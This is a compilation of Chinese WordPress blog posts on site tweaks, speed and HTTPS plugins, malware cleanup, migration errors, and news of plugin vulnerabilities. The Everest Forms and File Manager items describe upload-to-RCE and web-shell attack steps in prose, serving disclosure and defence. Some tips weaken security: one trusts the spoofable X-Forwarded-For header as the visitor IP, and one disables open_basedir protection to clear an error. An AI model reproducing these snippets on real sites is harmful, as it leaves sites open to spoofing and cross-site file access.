content="2017-03-13T15:01:40+01:00" /> <meta property="bytedance:updated_time" content="2017-03-13T15:01:40+01:00" /> published_time:最新发布时间 updated_time:最新更新时间 lrDate_time:最新回复时间 wordpress博客一般是文章为主,所以只需要最新发布时间和最新更新时间就行了。 代码如下: <?php if ( is_single() || is_page() ) { ?> <meta property="bytedance:published_time" content="<?php echo get_the_time('Y-m-d\TH:i:s+08:00'); ?>" /> <meta property="bytedance:updated_time" content="<?php echo get_the_modified_time('Y-m-d\TH:i:s+08:00'); ?>" /> <?php } ?> 进入wordpress后台,外观,主题文件编辑器-找到header.php文件,在<head>标签中加入上面的代码即可。 添加更新后,我们刷新下网站缓存,更新浏览器缓存,再访问网站文章页,就可以看到时间因子了。 #### WordPress博客程序使用百度云加速CDN如何获取用户真实IP Wordpress程序使用CDN后,用户注册登陆的IP都是显示百度云加速的IP节点,无法获取访客真实IP,那么我们可以通过修改wordpress的配置文件来实现获取真实IP。将一下代码添加到wp-config.php文件开头即可。if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $list = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $list[0]; } 效果见下图: #### wordpress博客程序如何解决打开慢打开顿卡问题 用wordpress的站长都知道,wordpress虽然很强大,但是其实运行效率低一直是主要毛病,主要反应在于使用wordpress系统后,你需要使用各种方法解决打开慢打开顿卡问题。 主机吧也是中了wordpress的毒,当初选wordpress的时候没注意这问题。不过现在已经来及了,只能想办法优化了。 1 禁用谷歌字体 wordpress默认是加载谷歌字体的,前段时间被国内墙了,导致很多网站打不开的情况,虽然现在已经解禁了,但是谷歌字体服务器是海外的多多少少还是有影响,我们还是禁了吧。禁用方法很简单,主机吧采用的是安装Disable Google Fonts这个插件,进入插件中心搜Disable Google Fonts安装启用即可。 2 页面静态化,解决首字节加载速度问题 不知道大家有没有注意到,像17测测试的时候会有一个参数——首字节时间,wordpress在没有任何优化下首字节时间时间是非常慢的,慢到没朋友那种。要解决首字节加载时间需要把网页静态化,主机吧采用安装了WP Super Cache这个插件,可以把网页缓存化,可以有效的解决首字节加载速度。 3 网站启用CDN加速 CDN加速可以有效解决因服务器宽带不足或服务器机房离得客户远,导致的访问慢情况。再好的机房如果离你半个地球这么远的距离,你访问还是会慢的,所以CDN有效解决了这个问题。目前国内免费的CDN服务有,百度云加速、360网站卫士、七牛CDN这三家比较好用。当然免费的有时候效果不是很好,我们可以买收费的,价格也不贵,几百块一年,比如百度云加速专业版的就挺便宜的。 #### wordpress博客被挂马以及防御方法 wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性也许大家在一些时候可能会遇到这样一个情况,就是在打开一个正规网站的时候点击了一个页面或者目录突然跳转到一些博彩或者一些非法网页上,最近的几个网友所反馈的问题都是出现在文章编辑区内被挂上一种包含多个博彩网站链接的木马,严重影响网站的运行,且很容易被搜索引擎惩罚。wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性。 所以我们在日常维护自己的网站时,一定要注重网站的安全性,最大限度的防止网站被挂上木马。一般来说,破解网站的途径是获取网站后台的管理员权限,从而进行修改网站文件,放置木马,这种方式是最为常见的也是最容易防御的。防御这种破解的方式请确保做好以下的工作: • 1. 管理员账号尽量不要使用admin这种简单的用户名,密码使用英文大写+小写+数字+特殊符号的方式,最大限度复杂化 • 2.确保你的wordpress升级到最新的版本,在使用的主题中,确保加载的js、css等文件不包含wordpress的版本号。 • 3.隐藏wordpress后台的登录地址,不要再前端页面出现后台页面地址。(小残没有做到这一点主要是为了方便大家登录) • 4.使用robot工具,屏蔽后台的地址,如wp-admin、wp-includes文件夹等,防止黑客使用蜘蛛查询后台文件。 • 5.可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录 • 6.安装安全插件,让密码或者账户连续输入3次错误,必须在一定时间之后才能再次登录。安全插件有常见的limit login attempts、WordPress File Monitor Plus等。已经被挂上木马了怎么办如果你的wordpress网站已经被挂上了木马,那么我们就要找到木马的位置,并且清除掉。 一般来说,目前所遇到的插件木马是使用js代码放置到前端,产生恶意链接、恶意跳转等方式劫持你的网站,而这些代码往往是放置在前端 的,或者使用php代码将js输出到前端。我们要清除这些恶意代码有几种方式可以解决: 1.从官方下载最新版本的wordpress,直接覆盖。覆盖时,wp-includes文件夹、wp-admin以及根目录的文件和文件夹可以直接覆盖掉。重新链接一次数据库,这样数据不会丢失,并且会消除掉这些文件夹可能携带的木马。如件覆盖之后,还是没有消除掉木马,可以逐个停用插件,逐个停用主题,排查木马所在位置。找到木马,并将其清除掉。2.手动查询木马 使用ftp工具查看自己的文件,可以看到最新修改的日期,如果最近没有自己修改过日期的话,一些明显日期修改比较靠近当前时间的文件就有非常大的嫌疑遭到修改挂上了木马。下载并打开文件,删除木马重新上传 或者直接使用官方下载的文件覆盖即可。3.使用然间查杀木马 这一类的查杀木马软件在很多服务器和虚拟主机上都会存在,如果没有可以自己安装一些这种软件,利用软件查杀木马。如何检测自己的网站是否被挂马使用McAfee SiteAdvisor安全浏览网页的插件。例:检测WEB主题公园是否被挂马 你可以打开这个网页,然后在右上方的输入框中输入你的网址,查询自己的网站是否被挂马。 防止wordpress网站被挂马的一些建议了解了以上的一些内容,相信你对网站安全已经有了一些认识。以下建议可以防止你被挂马的几率。 • 1.主题、插件已经要在官方发布的网站上下载,切勿在来历不明的转载网站上下载。 • 2.及时关注官方动态,更新主题、插件,保持你的主题和插件是最新的版本。 • 3.及时更新wordpress。确保你的wordpress是最新版本。 • 4.定期备份数据库和网站资料,出现问题可以及时恢复。 • 5.不要随意将来历不明的代码贴进你的网站,特别是你不怎么懂代码的情况下。 • 6.安装一些安全插件保护你的网站,前提是,这些插件一定要去官方下载。 • 7.实时关注你的网站,如果你对你的网站不闻不问,那么挂马了自己也不知道。网络安全一定要非常的注意,并且一定要得到广大站长的重视,做好网站防御,让黑客没有可乘之机,远离木马所带来的风险、 #### wordpress卡慢原因之一:Font Awesome字体库链接影响 今天一位客户反馈打开主机吧打开主机吧博客超卡,网页还不显示。 主机吧赶紧去查看,发现网页打开一直在链接 https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css 地址,基本打不开 百度搜索后发现这个一个字体库来的,那可能是主题带的链接,ping了下,发下这个地址的服务器居然是在美国的,怪不得打不开。 主机吧找了半天也没找到font-awesome这个链接在哪改,后来干脆联系B2主题程序员升级了最新版才解决。 主机吧查询了下 wordpress的字体应该是在主题的style.css文件修改的,如果你也遇到这个问题可以研究下。 这里主机吧不得不感慨下,wordpress作为全球最流行的开源程序,由于不是国内开发的,很多链接都是美国的,不仅容易卡,而且其它问题也多多,真心希望国人什么时候能开发一款适合中国人程序。 #### wordpress固定链接url自动转换英文教程 主机吧的博客之前一直是用拼音来做固定链接的,不过效果不是很好,URL不仅长,而且不美观。 听说英文URL对必应搜索和谷歌搜索效果好,所以主机吧想着干脆把固定链接换成英文吧。找了很久,网上的一些插件都过时了,没什么效果。 最后还是用Wenprise Pinyin Slug插件解决了,大家要下载的话去wordpress插件市场下载即可。 操作方法如下: 进入Wenprise Pinyin Slug插件设置: 转换方式:百度翻译 拼音分隔符:_ 别名长度限制:256 百度翻译APP ID:进入http://api.fanyi.baidu.com/api/trans/product/index 注册帐号,注册成百度开发者 进入开发者信息即可看到APP ID和密钥 需要注意的是需要在通用文本翻译服务中正确填写服务器IP,否则无法进行翻译。 设置完后,我们进入wordpress-设置-固定链接-自定义结构修改成/%postname%.html 我们现在来看效果 已自动翻译英文,这样翻译可能URL会很长,但考虑到其对SEO的效果,主机吧还是这样设置了,因为没有人会注意URL的美观,而且搜索引擎没有限制URL的长度。 #### WordPress域名主机托管 100 年计划 8月28日消息:如果你担心失去域名,WordPress 为你提供了一个 100 年的解决方案。 通常情况下,域名注册期限最长只有 10 年。但是,通过这个新计划,WordPress 将会为您注册和托管网站达到一个世纪之久,这意味着它可能会比您(以及制定此计划的 WordPress 高管,甚至可能是公司本身)还要长寿。 这里的想法是为那些希望保留超过一代人内容的公司和家庭提供服务。一些建议使用场景包括「希望保存数字资产——故事、照片、声音和视频……直至几代人后」以及「想要保护并记录其公司过去、现在和未来」的创始人们。 通过该计划,客户不仅可以获得一个世纪的域名注册,而且还可以通过 WordPress 获得无限流量主机以及 24/7 个性化支持。WordPress 表示将在分布式数据中心中保留多个备份,并在公开内容时自动提交您的网站给互联网档案馆。 同时,在 100 年计划中也设置了所有权协议,因此您可以将 URL 所有权转移给孩子或其他新用户——这是不可避免的问题。 WordPress 官方表示,一百年计划不仅仅关乎今天。这是对明天的投资。无论您是要巩固自己的数字遗产,还是向所爱的人赠送 100 年的值得信赖的平台,该计划都证明了未来的无限潜力。 正如你所想象的那样,该计划并不便宜。价格为 38,000 美元(或每年 380 美元),这可能超出了许多人的预算。 不过,如果您有兴趣,请在 WordPress 网站上填写此表格:https://wordpress.com/100-year/ 另外,此前WordPress 还引入人工智能写作助手「Jetpack AI」,为这个流行的网站内容管理系统提供支持,Jetpack AI 支持中文等 12 种语言。 #### WordPress如何开启调试模式 最近一直在研究给wordpress换个主题,不过一直不顺利,主要是主机吧对wordpress了解少,而且也不是一个程序员,换着换着就把wordrpress弄出个致命错误来了。 问了许多人也没解决,只能自己百度搜着试试吧,不过wordpress查看故障倒是挺方便的,只要打开调试模式就行,具体哪里有问题就会显示出来,具体如何打开调试模式呢? 首先进入网站WordPress根目录,找到wp-config.php 文件,编辑,把define('WP_DEBUG', false);改为define('WP_DEBUG', true); 即可开启调试模式,这样就很方便的找出哪里出问题了。   #### wordpress如何混淆代码,混淆代码会影响SEO吗? 在 WordPress 中混淆代码可以采取以下几种方式: 使用插件: WordPress 有很多插件可以帮助你混淆代码,例如 WP Encrypt 和 WP Obfuscator 。这些插件可以帮助你自动混淆代码,从而保护你的网站免受黑客攻击。 压缩和混淆javascript和CSS文件: 你可以使用批处理文件或在线工具等软件来混淆压缩javascript和CSS文件。混淆后的文件难以阅读,避免了黑客分析源代码的可能性。 隐藏敏感信息: 在代码使用时尽可能的减少说明注释代码,同时隐藏掉敏感信息、数据库名、密码等重要信息。 加密内容: 对于一些敏感的内容,你可以使用加密算法来保护,例如MD5加密等。 在实际的操作过程中,你可以选择其中一种或多种方式来确保你网站的代码更加安全,从而保护你的网站免受攻击。 混淆代码会影响SEO吗? 混淆代码是通过更改代码的格式和结构来使代码更加难以理解和阅读从而阻碍别人对代码的盗取和修改。对于WordPress站点,可以使用一些插件和工具来混淆文件,如混淆JavaScript文件的插件,以及对PHP文件进行加密的工具。 然而,混淆代码可能会对SEO造成一定的影响,因为搜索引擎往往更喜欢阅读具有良好结构和组织的代码,这样可以更好地理解网站内容和结构。如果您使用的混淆技术导致代码难以阅读和理解,那么搜索引擎可能会认为您的网站质量不佳或代码质量不佳,并且排名可能会下降。 另外,如果您的网站代码被混淆,那么可能会更难进行调试和更新,这可能会给您带来一些额外的工作和时间成本。因此,混淆代码需要谨慎使用,并且应该在确保不会对SEO和其它方面造成负面影响之前进行测试和评估。 #### wordpress如何设置支持上传webp格式图片文件 为什么要支持webp图片呢?因为webp实在太吊了,可以把图片无损压缩成只有原来一半或以下大小的图片文件,主机吧的一个微信公众号图片4MB的,转换成webp的大小只有28KB! 而且图片质量却没有损失,简直恐怖,如果把网站的图片全换成webp的话,那估计网站加载速度可以省下一两秒。 没压缩前,大小4MB 压缩后,大小28KB 教你转换之前我们先来了解下webp格式的由来。 WebP是Google在2010年推出的影像技术,文件扩展名为“.webp”。 图片压缩体积大约只有JPEG的2/3,同时又不影响图片格式兼容与实际清晰度,进而节省大量的服务器宽带资源和数据空间。让整体网页下载速度加快。 不过WebP缺点是有的,就是部分浏览器或者客户端并不支持显示WebP格式的文件,比如我们wordpress、windows,默认情况下是无法读取WebP文件的。 当然WebP出来已经10年了,几乎95%的程序都是支持WebP的,比如微信就支持,所以取舍问题,我们还是选择速度至上,给wordpress开启支持WebP图片。 具体步骤: 使用代码编辑器直接编辑 /wp-includes/functions.php 1、打开文件搜索 'image/jpeg' => 'jpg', 在下一行加入 'image/webp' => 'webp', 2、继续搜 'jpg|jpeg|jpe' => 'image/jpeg', 下一行加入 'webp' => 'image/webp', 修改后保存,刷新网页即可生效。 如图wordpress缩略图无法显示WebP图片怎么办?修改functions.php文件,在底部添加以下代码保存即可。 function bzg_file_is_displayable_image($result, $path) { $info = @getimagesize( $path ); if($info['mime'] == 'image/webp') { $result = true; } return $result; } add_filter( 'file_is_displayable_image', 'bzg_file_is_displayable_image', 10, 2 );   需要说明的是之前上传的webp图片是不会显示的,只能添加代码后上传的webp文件才会显示缩略图。 #### WordPress官方推出主题和插件自动更新功能 解决网站遭黑客攻击 3月16日 消息:WordPress开发团队正在为主题和插件添加自动更新机制,由于网站运营者安装主题和插件后忘记更新版本,出现漏洞的情况下就容易遭黑客攻击。 据悉,WordPress在几个月前就开始开发相关特性,其中插件已经实现了自动更新功能,并且正在努力将其添加到WordPress的主题功能中。 WordPress内容管理系统(CMS)的稳定版本自动更新选项上线后,网站运营者就可以通过网站的管理面板中选择一个选项自我更新配置主题和插件。 网络安全公司经常指出,当今被黑客攻击的WordPress站点的绝大多数都是在黑客利用过时的插件和主题的漏洞后被攻击的。一旦WordPress在5. 4 版本中推出新功能,预计能减少WordPress网站被黑客攻击的数量。(zdnet) #### wordpress官网又无法访问了 每次有什么重大会议,一些海外的网站总会出现访问不了情况,原因当然是我们的长城防火墙把他们拦截在外面了。 这不,去年有很长一段时间无法访问的wordpress.org官网,最近又无法正常访问了。 直接导致了,使用了wordpress做的网站,无法更新插件,无法更新wordpress版本。 所以,用国外的开源软件的同学,要小心了,一年总会有那么几次无法访问的。而且有时候会访问非常慢,总之极度不稳定。 好在,wordpress已经可以去除一些国外的链接了,而且国内开发者针对这情况,也开发了相应的插件,可以实陆即使官网无法访问,也可以实现更新。 这里主机吧推荐这个用 WP-China-Yes这款插件进行国内化。 #### wordpress实现远程图片本地化插件 支持最新版本wordpress 主机吧经常发布一些精品教程,其实有很多并不是原创的,很多都是看到客户有需求,所以才转载过来的。有些教程涉及到很多图片截图,如果直接复制过来的话图片外链都是别人家的服务器,假如果哪天人家网站不做了,那些图片也就失效了,为了防止这些事情发生,主机吧往往都是一张图一张图的保存到本地电脑,再上传到主机吧服务器上,一两张图片的文章并不会觉得有多麻烦,但一张文章几十张图片的全部别存过来就很费事,甚至有时候容易出错,上传错图片。为了省事,也为了防止错误发生,主机吧就想到了另用插件实现远程图片本地化的方法,能用代码解决的问题,尽量用代码解决。 之前找过很多插件,不过都是很久没有更新过的,不能保证是否完美支持wordpress最新版本。不过幸好走运直接找到了个不错的插件,而且最新更新还是一个月前的,主机吧试了下,效果非常好,而且功能强大,特地推荐大家——QQWorld Auto Save Images   插件很容找,直接进入插件-安装插件--搜索插件名:QQWorld Auto Save Images即可找到。 安装后直接启用:然后进入插件,设置,按自己的需要设置,主机吧的设置如下: 测试效果(如发现以下图片地址已是本地链接了,说明已经生效,图片文章采集转自站长之家文章—腾讯在贵州挖了个山洞:放置腾讯业务最核心数据) 4 月 1 日,腾讯公司发布了一段短片,跟大家开了个愚人节玩笑。腾讯宣布,筹备近两年的“AI生态鹅厂”已在贵州贵安新区完成项目主体建设,预计于年内投产运行。 由于企鹅所需饲养条件较高,目前腾讯将先以贵州平坝灰鹅作为试点,未来或考虑引入天鹅和企鹅。据说还有鹅脸识别、鹅语翻译、觅影治鹅、鹅屎咖啡等技术。 今天腾讯宣布,养鹅是不存在的,但贵州贵安新区的那个山洞却是真正存在的。它叫腾讯贵安七星数据中心,是一个特高等级数据中心。 2017 年 10 月,腾讯贵安七星数据中心工程正式进入项目建设施工阶段,项目主体为五横一竖共六个隧道。工程建成后,整个数据中心的工作、电力等设备将全部置于其中。 腾讯表示,它具有高度安全,高隐蔽、高防护的特点,将用来放置腾讯业务最核心的数据,代表着腾讯在数据产业的前瞻战略。 数据中心是干嘛的?“如果把腾讯比作一个工厂,那么数据中心就是车间,信息需要在这里集中处理、存储、交换。”腾讯技术工程事业群任职数据中心技术总监朱华说。 那个名叫T-block的技术,是腾讯数据中心自主研发的第四代技术。 腾讯数据中心的技术发展,总共经历四个阶段: #### WordPress将在网站上自动禁用 Google FLoC WordPress 宣布,其认为 Google 新的 FLoC 跟踪技术是一种安全问题,并计划在 WordPress 网站上默认屏蔽它。 随着对用户隐私保护的重视,越来越多的浏览器已经开始阻止广告商的第三方 cookies。对此,Google 推出了一项名为 Federated Learning of Cohorts(即FLoC)的新广告追踪技术。FLoC 的工作原理是将数千名具有相似浏览历史的用户归为一个 "用户群( cohort )",这个 "用户群" 是通过设备上的机器学习分析你的网络浏览历史而创建的。你所访问的网站列表不会暴露出来(联合学习),只有 "用户群 ID "会暴露并用于广告。 然而,之后很多人认为 Google 的 FLoC 方案只是用一个隐私风险取代了另一个隐私风险。因此,DuckDuckGo 更新扩展,以阻止 Google FLoC 追踪,Brave、Vivaldi 亦采取措施阻止 Google FloC。在最新的公告中,WordPress 表示,他们认为谷歌的 FLoC 技术是一个安全问题,并将在未来的版本中开始阻止它。相关代码如下: function disable_floc($headers) { 此外,WordPress 还表示,他们可能会添加一个设置,以允许用户控制是否允许 FLoC。其认为,那些不知道这种新的追踪技术的用户会在不完全了解其内容的情况下自动选择加入,因此,自动禁用该技术是符合这些用户的最大利益的。 据悉,该屏蔽功能计划在预定于 2021年7月发布的 WordPress5.8中推出。 #### WordPress建的网站每天被cc攻击,有什么好办法? 被CC攻击是指遭受分布式拒绝服务(DDoS)攻击,攻击者利用大量的计算机或设备对一个目标进行网络流量的超载,从而使目标无法正常工作。这种攻击方式很常见,但也有一些方法可以帮助您缓解其影响。 以下是一些可能有助于缓解WordPress站点被CC攻击的方法: 使用CDN:内容分发网络(CDN)可以帮助减轻服务器负载,并帮助过滤掉恶意流量。CDN通过将站点内容分发到全球不同的服务器上来加快访问速度,同时可以缓存和过滤请求,以减少攻击对服务器的冲击。 限制登录尝试次数:通过安装插件或修改代码,可以限制对站点进行登录尝试的次数,并在多次失败后暂时锁定帐户。这可以减少攻击者对站点的暴力破解攻击。 使用防火墙:安装防火墙可以帮助过滤掉大量的恶意流量,包括CC攻击。例如,您可以使用云防火墙,如百度云加速或京东云星盾防火墙,来过滤CC攻击流量。 升级WordPress和插件:WordPress和其插件的更新通常包括安全修复程序,可帮助防止攻击。确保您的WordPress和插件是最新版本,以保护您的站点免受已知漏洞的攻击。 托管在高防服务器上:选择可靠的高防服务商可以帮助保护您的站点免受攻击。一些提供商可能提供DDoS保护或其他安全措施,可以帮助您缓解CC攻击。 总之,CC攻击是一种常见的网络安全威胁,但通过采取一些预防措施,可以降低其影响。建议您考虑使用CDN,限制登录尝试次数,使用防火墙,升级WordPress和插件,并选择可靠的主机提供商。 #### WordPress开启https插件:Really Simple SSL 目前HTTPS站点已经非常普及了,国外网站高达80%都是HTTPS了,而我们国内相对落后些,不过也达70%左右了。 所以如果你的博客还是HTTP,那还真不好意思拿出来见人,所以博客HTTPS改造势在必行。 HTTPS改造除了在网站服务器上部署SSL证书外,其实最难的就是网站程序修改,因为很多网站程序默认链接是HTTP的,一但用HTTPS访问会出现网页面错误等情况。 所以我们需要一个一建改造HTTPS的插件,这个插件叫Really Simple SSL Really Simple SSL插件已经被WordPress官方收录,兼容最新版WordPress,而且有超过300万的安装激活量,可以说是非常好用的一个插件来的 Really Simple SSL插件官方地址:https://wordpress.org/plugins/really-simple-ssl 国内镜像站http://cn.wp101.net/plugins/really-simple-ssl #### WordPress插件All In One SEO Pack信息泄露漏洞深度解析 近日,国家信息安全漏洞共享平台(CNVD)收录了WordPress插件All In One SEO Pack的一处信息泄露漏洞(CNVD-2026-04186),对应的CVE编号为CVE-2025-64295。该漏洞影响范围较广,所有版本号低于或等于4.8.6.1的插件均存在风险,危害级别被评为“中”。本文将对该漏洞的背景、影响、修复方案等进行系统梳理。 漏洞概述 CNVD-ID:CNVD-2026-04186 CVE-ID:CVE-2025-64295 公开日期:2026年1月16日 危害级别:中(AV:N/AC:L/Au:S/C:C/I:N/A:N) 影响版本:WordPress插件All In One SEO Pack ≤ 4.8.6.1 漏洞描述 All In One SEO Pack是一款广受欢迎的WordPress SEO优化插件,用于帮助网站提升搜索引擎可见性。该漏洞源于插件在处理数据发送过程中,未对敏感信息进行充分过滤或保护,导致在返回给用户的数据中可能包含本应保密的系统或用户信息。攻击者通过构造特定请求,可间接获取这些敏感数据,从而造成信息泄露。 该漏洞属于“通用型漏洞”,意味着任何使用受影响版本插件的WordPress网站均可能暴露在风险之中。 潜在危害 尽管该漏洞的危害级别为“中”,但其可能导致以下实际威胁: 敏感信息泄露:可能泄露网站配置、用户数据、内部路径等敏感信息。 信息搜集与后续攻击:攻击者可以利用获取的信息进行更精准的网络攻击。 违反数据合规性:若泄露用户个人信息,可能导致违反GDPR等数据保护法规。 修复建议 目前,厂商已发布修复版本。建议所有使用该插件的网站管理员立即采取以下措施: 升级插件:尽快将All In One SEO Pack插件更新至最新版本。 检查当前版本:登录WordPress后台,进入“插件”页面,确认当前插件版本。 关注官方更新:定期关注WordPress插件页面的更新动态,及时应用安全补丁。 官方插件地址:https://wordpress.org/plugins/all-in-one-seo-pack/ 漏洞详情参考:可查看NVD对该漏洞的详细说明: https://nvd.nist.gov/vuln/detail/CVE-2025-64295 关于CNVD 国家信息安全漏洞共享平台(CNVD)是由国家计算机网络应急技术处理协调中心(CNCERT)联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的国家级漏洞信息共享知识库。该平台在漏洞公开前会力求保证信息的准确性和可靠性,但用户采纳和实施相关建议仍须结合自身安全策略进行决策。 总结 All In One SEO Pack插件的这一信息泄露漏洞再次提醒我们,即便是广泛使用的第三方插件也可能存在安全隐患。作为网站运营者或开发者,定期更新系统和插件、监控安全公告、实施最小权限原则,是维护网站安全的基本要求。及时修复已知漏洞,才能有效降低被攻击的风险,保护网站与用户数据的安全。 注:本文内容基于CNVD公开漏洞公告整理,建议读者结合官方渠道信息进行验证与操作。 #### WordPress插件Everest Forms曝高危漏洞,10万网站面临远程代码执行风险 2025年3月2日,据网络安全机构Wordfence披露,知名WordPress第三方表单插件Everest Forms存在一个严重安全漏洞(CVE-2025-1128),攻击者可利用该漏洞绕过文件验证机制,向目标网站上传恶意文件并远程执行任意代码,最终完全控制服务器。目前,全球约10万家使用该插件的网站面临威胁。 漏洞详情与风险等级 该漏洞的CVSS风险评分高达9.8分(满分10分),属于“严重”级别,影响所有3.0.9.5版本之前的Everest Forms插件。安全研究人员Arkadiusz Hydzik发现此漏洞后向Wordfence提交报告,并因此获得**4290美元(约合31274元人民币)**的漏洞奖励。 技术成因与攻击路径 根据Wordfence漏洞研究员István Márton的分析,漏洞源于插件中EVF_Form_Fields_Upload类的设计缺陷。该类未对用户上传文件的类型、路径及后缀名进行有效验证,导致攻击者可通过以下步骤实施攻击: 恶意文件伪装:将包含PHP代码的CSV或TXT文件重命名为PHP扩展名; 绕过验证上传:利用插件的文件上传功能将伪装文件传输至服务器; 公开访问目录存储:WordPress自动将文件移至公开可访问的上传目录; 远程代码执行:攻击者直接触发恶意PHP文件,在服务器上执行任意指令。 更危险的是,攻击者还可通过此漏洞读取或删除网站数据,例如篡改关键配置文件wp-config.php,从而彻底控制网站。 修复与应对措施 目前,Everest Forms开发者已紧急发布3.0.9.5版本补丁修复漏洞。Wordfence建议所有用户立即更新插件至最新版本,并检查服务器日志中是否存在异常文件上传记录。 总结 此次漏洞事件再次凸显第三方插件对网站安全的重大影响。对于依赖WordPress的企业和个人站长,需建立定期更新机制,并优先选择经过严格安全审计的插件,以降低被攻击风险。 #### WordPress插件出现严重漏洞,百万网站遭探测和攻击 9月7日 消息:根据Wordfence网络防火墙背后的公司Defiant消息,上周数以百万计的WordPress网站遭到了探测和攻击。 黑客发现并开始利用“File Manager”中的一个零日漏洞后,攻击突然激增。“File Manager”是一个安装在 70 多万个站点上的流行WordPress插件。 而该零日漏洞是一个未经身份验证的文件上传漏洞,它允许攻击者将恶意文件上传到运行较旧版本“File Manager”插件的站点上。 目前尚不清楚黑客是如何发现插件的零日漏洞,但从上周早些时候开始,他们开始搜索可能安装该插件的网站。 一旦探测到,攻击者将利用零日,在受害者的服务器上上传一个伪装在图像文件中的web shell。然后,攻击者将访问web shell并控制受害者的站点。 (站长之家注:webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。) “过去几天来,针对这一漏洞的攻击急剧增加,”Defiant的威胁分析师Ram Gall表示。 攻击开始缓慢,但在过去一周不断加强,仅仅在 9 月 4 日, Defiant 就记录了对 100 万个WordPress站点攻击记录。 Gall表示,自 9 月 1 日第一次发现攻击以来,Defiant总共阻止了对 170 多万个网站的攻击。 170 万这个数字超过了使用Wordfence网络防火墙网站数量的一半。Gall认为,攻击的真正规模甚至更大,因为WordPress被安装在数以亿计的网站上,所有这些网站都可能逐渐被探测和攻击。 好消息是,File Manager开发团队在发现攻击的同一天发布了一个补丁,一些网站所有者已经安装了补丁。 最近,WordPress开发团队为WordPress主题和插件添加了一个自动更新功能。 从上个月发布的WordPress 5. 5 开始,网站所有者可以配置插件和主题,以便在每次有新更新发布时自动更新自己,并确保他们的网站始终运行主题或插件的最新版本,以确保安全不受攻击。 #### WordPress插件出现漏洞 允许黑客清除多达20万个网站 2月18日 消息:使用ThemeGrill提供的商业主题的WordPress站点用户注意了,建议大家赶紧更新与这些主题一起安装的一个插件,以便修补一个允许攻击者清除网站的关键漏洞。 该漏洞存在于ThemeGrill Demo Importer,该插件附带附带了出售商业WordPress主题的web开发公司ThemeGrill出售的主题。 这个插件安装在 20 多万个网站上,允许网站所有者将演示内容导入他们的ThemeGrill主题中,这样他们可以通过示例的基础上构建自己的网站。 然而,在昨天发布的一份报告中,WordPress安全公司WebARX表示,老版本的ThemeGrill Demo Importer很容易受到未经身份验证的攻击者的远程攻击。远程黑客可以向易受攻击的网站发送特制的有效载荷,并触发插件内部的功能。 易受攻击的函数将站点的内容重置为零,有效地清除了所有WordPress站点中ThemeGrill主题激活的内容,并且安装了易受攻击的插件。 此外,如果站点的数据库包含一个名为“admin”的用户,那么攻击者将被授予对该用户的访问权,该用户拥有站点的完全管理员权限。 WebARX表示,该漏洞影响了所有1.3. 4 到1.6. 1 版本的ThemeGrill Demo Importer插件。插件的开发者ThemeGrill修复了这个漏洞,并在周末发布了1.6. 2 版。 #### WordPress插件现高危RCE漏洞,可执行任意代码 PHP Everywhere 是一个开源的 WordPress 插件,近日该插件被披露存在三个严重的安全漏洞,该插件已被全球超过3万个网站使用,攻击者可在受影响的网站上利用该漏洞,执行任意代码。 PHP Everywhere 可以随时随地启用 WordPress 上的 PHP 代码,使用户能够在内容管理系统的页面、帖子和侧边栏中插入和执行基于 PHP 的代码,该插件还支持不同的用户限制和多个 PHP 实例。 这三个漏洞在 CVSS 评级系统中都被评为9.9分(最高10分),影响了2.0.3及以下版本,漏洞具体细节如下: CVE-2022-24663- 该漏洞允许任何经过身份验证的用户通过parse-media-shortcodeAJAX 操作执行简码(shortcode),从而进行远程代码执行(网站上几乎没有权限的登录用户,也可以完全接管网站,即 WordPress 中的订阅者)。CVE-2022-24664- 通过 metabox 进行远程代码执行(该漏洞需要 WordPress 贡献者级别的权限,因此严重程度较低)。CVE-2022-24665- 通过 gutenberg 块进行远程代码执行(同样需要 WordPress 贡献者级别的权限) 如果网站存在这三个漏洞,黑客将可以利用它们并执行恶意的 PHP 代码,甚至可以实现对网站的完全接管。 WordPress 安全公司 Wordfence 在1月4日就向该插件的作者 Alexander Fuchs 披露了上述这些漏洞,随后在1月12日发布了3.0.0版本的更新中,已完全删除了有漏洞的代码。 PHP Everywhere 的更新说明显示: 这个插件的3.0.0版本更新具有重大变化,移除了 PHP Everywhere 的简码和小组件。从该插件的设置页面运行升级向导,将你的旧代码迁移到 Gutenberg 块。 需要注意的是,3.0.0版本只支持通过块编辑器(Block editor)的 PHP 代码片段,这使得仍然依赖经典编辑器的用户必须卸载该插件,并下载一个替代解决方案来托管自定义 PHP 代码。 根据 WordPress 的统计数据显示,自修复错误以来,目前仅有1.5万个网站更新了该插件。 #### wordpress搬家出现wp-content/advanced-cache.php on line 22错误解决办法 继之前说的,主机吧搬家后,发现搬家错误,出现很多错误代码。其中之一就是 Warning: include_once(/www/wwwroot/zhujib.com/wp-content/plugins/wp-super-cache/wp-cache-phase1.php): failed to open stream: Operation not permitted in /www/wwwroot/zhujib.com/wp-content/advanced-cache.php on line 22 这个其实很简单,就是WP Super Cache插件造成的,直接关掉插件即可,不过主机吧发现登陆wordpress后台后,WP Super Cache插件自动修复错误了,所以不必担心。 #### wordpress搬家出现wp-includes/functions.php on line 2001错误解决办法 最近由于百度云服务器到期,而且百度云的开春活动并没有多少优惠服务,加上腾讯云活动力度很多,于是就打算把博客搬到腾讯云去了,搬家的时候还是遇到了一些问题,源码、数据库都导入了,而且数据库文件也改了,不过访问网站还是出现一堆代码错误。 比如出现: Warning: is_dir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/www/wwwroot/zhujib.com/:/tmp/) in /www/wwwroot/zhujib.com/wp-includes/functions.php on line 2001 主机吧查了下,发现是宝塔设置的防跨站攻击引起的错误,直接进入网站,设置,网站目录,把防跨站攻击(open_basedir) 勾选取消掉即可。 然后,这个错误就自然没了。 #### wordpress搬家出现无法建立目录wp-content/uploads/2021/03有没有上级目录的写权限错误 